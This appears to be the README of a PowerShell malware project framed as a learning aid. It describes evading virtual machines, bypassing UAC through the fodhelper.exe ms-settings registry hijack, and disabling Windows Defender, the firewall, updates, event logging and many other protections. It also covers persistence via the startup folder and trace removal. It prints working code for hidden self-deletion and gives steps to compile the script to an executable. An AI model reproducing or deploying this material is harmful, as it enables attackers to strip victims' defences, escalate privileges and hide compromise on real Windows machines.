Warning
This script was NOT optimized to shorten and obfuscate the code but rather intended to have as much readability as possible for new coders to learn!
-
Well, if we want to disable Windows's security features, we can use Registry Editor for that. However, we will need administrative privileges to access regedit. Like who's gonna run a malware as administrator?
-
First, the script will check if it is running in a virtual environment, if it is, it will delete itself.
Note
The Anti-VM feature in this script was written by referencing the Metasploit's "checkvm" module.
| Currently Supported VMs | Status |
|---|---|
| Parallels | Tested ✅ |
| Hyper-V | Tested ✅ |
| VMware | Tested ✅ |
| VirutalBox | Tested ✅ |
| Xen | Tested ✅ |
| QEMU/KVM | Tested ✅ |
-
In Windows, when a user is requesting to open “Manage Optional Features” in settings, a process is created under the name “fodhelper.exe”. This process is running with the highest privileges without any permissions being asked directly when executed because it's a trusted binary and signed by Microsoft.
-
The following checks are performed in the registry upon start of fodhelper.exe:
HKCU:\Software\Classes\ms-settings\shell\open\command HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
- Since these registry entries doesn’t exist, we can create this structure in the registry to manipulate fodhelper to execute our script with higher privileges bypassing the User Account Control (UAC).
> All The Windows Defender Features (including SmartScreen)
> Windows Firewall
> Windows Update
> System Restore
> Task Manager
> Command Prompt (Cmd)
> Remote Desktop
> User Account Control (UAC)
> Windows Security Center
> Windows Error Reporting
> Remote Assistance
> Windows Update Medic Service
> Background Intelligent Transfer Service (BITS)
> Windows Script Host
> Event Logging
> Windows Security Notifications
> Windows Search
> Automatic Maintenance
> Virtualization Based Security-
After disabling the Windows Security features, the script will copy itself to the startup folder with a random file name for persistence and will delete all traces of its execution.
-
However, when the script is compiled and executed as an ".exe" file, it becomes a process, and we can no longer modify or delete the file itself due to the File Locking Mechanism.
-
Since we couldn't delete the script itself after it has done its job, we have 2 alternatives to delete it:
$ScriptPath = $MyInvocation.MyCommand.Path
$ExePath = (Get-Process -Id $PID).Path
$FullPath = if ($ScriptPath) { $ScriptPath } else { $ExePath }
# First alternative: Start another process to delete it
Start-Process powershell.exe -ArgumentList "-NoProfile -Command `"Remove-Item -Path '$FullPath' -Force -ErrorAction SilentlyContinue`"" -WindowStyle Hidden
# Second alternative: Create a temporary batch script to delete it
$tempScript = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), [System.IO.Path]::GetRandomFileName() + ".cmd")
$cmdContent = "chcp 1252" + [Environment]::NewLine + "ping 127.0.0.1 -n 2 > nul" + [Environment]::NewLine + "del /q /f `"$FullPath`"" + [Environment]::NewLine + "del /q /f %~f0"
Set-Content -Path $tempScript -Value $cmdContent
Start-Process cmd.exe -ArgumentList "/c $tempScript" -WindowStyle HiddenThe first alternative has been used in the script.
1. Open PowerShell as administrator
2. Install PS2EXE
Install-Module ps2exe3. Open the GUI
win-ps2exeImportant
Tip
I would really like to add an Escape-VM feature to this script, but it's a really complicated thing, soo if you wanna help me you can open a pull request :)